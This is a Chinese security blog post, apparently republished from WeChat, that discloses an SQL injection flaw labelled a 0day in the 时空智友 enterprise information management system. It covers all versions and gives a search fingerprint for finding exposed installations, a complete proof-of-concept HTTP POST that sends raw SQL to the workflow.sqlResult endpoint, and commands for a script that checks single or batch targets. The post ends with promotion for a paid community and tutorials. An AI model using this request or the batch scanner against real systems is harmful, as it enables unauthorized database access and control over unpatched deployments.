【0day】时空智友企业信息管理系统 SQL注入漏洞
2023-9-17 23:5:2 Author: mp.weixin.qq.com(查看原文) 阅读量:21 收藏


时空智友企业信息管理系统是一个用于企业流程管理和控制的软件系统。它旨在帮助企业实现流程的规范化、自动化和优化,从而提高工作效率、降低成本并提升管理水平。系统存在SQL注入漏洞,攻击者通过恶意构造的SQL查询来执行未经授权的数据库操作。当应用程序未能正确验证、转义或过滤用户提供的输入数据时,攻击者可以利用这个漏洞来执行恶意的SQL语句,从而获取系统数据以及获得系统控制权限。

时空智友企业信息管理系统所有版本

body="时空智友企业信息管理"

四、POC

POST /formservice?service=workflow.sqlResult HTTP/1.1Host: ip:portUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: JSESSIONID=48F4377921FEFB1A3A3365AF6D0B5D5D; __qypid=DNT: 1Connection: closeUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 60



{"params": {"a": "11"}, "sql": "select db_name()"}

单个检测利用

python .\SHIKONGZHIYOU_poc.py -u http://ip:port

SQL Server 语法参考:

https://blog.csdn.net/qq_36119192/article/details/88679754

批量检测

python .\SHIKONGZHIYOU_poc.py -f filename

如果你是一个长期主义者,欢迎加入我的知识星球(优先查看这个链接,里面可能还有优惠券),我们一起往前走,每日都会更新,精细化运营,微信识别二维码付费即可加入,如不满意,72 小时内可在 App 内无条件自助退款

往期回顾

2022年度精选文章

SSRF研究笔记

xss研究笔记

dom-xss精选文章

Nuclei权威指南-如何躺赚

漏洞赏金猎人系列-如何测试设置功能IV

漏洞赏金猎人系列-如何测试注册功能以及相关Tips

福利视频

笔者自己录制的一套php视频教程(适合0基础的),感兴趣的童鞋可以看看,基础视频总共约200多集,目前已经录制完毕,后续还有更多视频出品

https://space.bilibili.com/177546377/channel/seriesdetail?sid=2949374

技术交流

技术交流请加笔者微信:richardo1o1 (暗号:growing)


文章来源: https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&mid=2247491982&idx=1&sn=23ebfddbee5bff5813db87485b40d1ae&chksm=e8a5ebeddfd262fb2d5a52ce674e0355d14f081ed47cddfe1405e10815f68b48d79def921d7c&scene=58&subscene=0#rd
如有侵权请联系:admin#unsafe.sh